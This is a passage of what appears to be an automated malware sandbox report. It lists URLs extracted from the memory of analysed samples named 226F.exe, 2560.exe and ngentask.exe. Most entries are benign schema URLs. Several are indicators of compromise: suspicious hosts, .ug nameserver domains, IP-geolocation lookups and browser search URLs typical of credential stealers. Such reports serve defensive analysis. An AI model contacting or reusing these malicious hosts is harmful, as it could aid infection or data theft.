              Source: 226F.exe, 00000010.00000002.479576664.000000000168A000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000002.479576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.470339052.00000000016DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s/
              Source: 226F.exe, 00000010.00000002.479576664.00000000016DA000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.470339052.00000000016DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s/8
              Source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
              Source: ngentask.exe, 00000012.00000003.456193929.000000000196C000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.459451684.000000000196E000.00000004.00000020.00020000.00000000.sdmp, ngentask.exe, 00000012.00000003.456098286.000000000196B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ns.adobe.c/g
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
              Source: ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
              Source: ngentask.exe, 00000012.00000002.466719826.00000000046A4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14V
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
              Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Responseon
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Responseon
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id3Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id4y/
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id5Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id6Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id7Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id8Response
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9
              Source: ngentask.exe, 00000012.00000002.460489461.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000367E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id9Response
              Source: 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
              Source: ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: 2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/
              Source: 2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/N
              Source: 2560.exe, 0000000F.00000002.362651886.0000000004A00000.00000040.00001000.00020000.00000000.sdmp, 2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.363362004.0000000000400000.00000040.00000400.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.json
              Source: 2560.exe, 00000011.00000003.362777696.00000000007E0000.00000004.00000020.00020000.00000000.sdmp, 2560.exe, 00000011.00000002.364169041.00000000007E1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.2ip.ua/geo.jsony
              Source: 226F.exe, 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, 226F.exe, 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.ip.sb/ip
              Source: ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: ngentask.exe, 00000012.00000002.460489461.0000000003671000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.00000000045A6000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.0000000004681000.00000004.00000800.00020000.00000000.sdmp, ngentask.exe, 00000012.00000002.466719826.000000000469E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
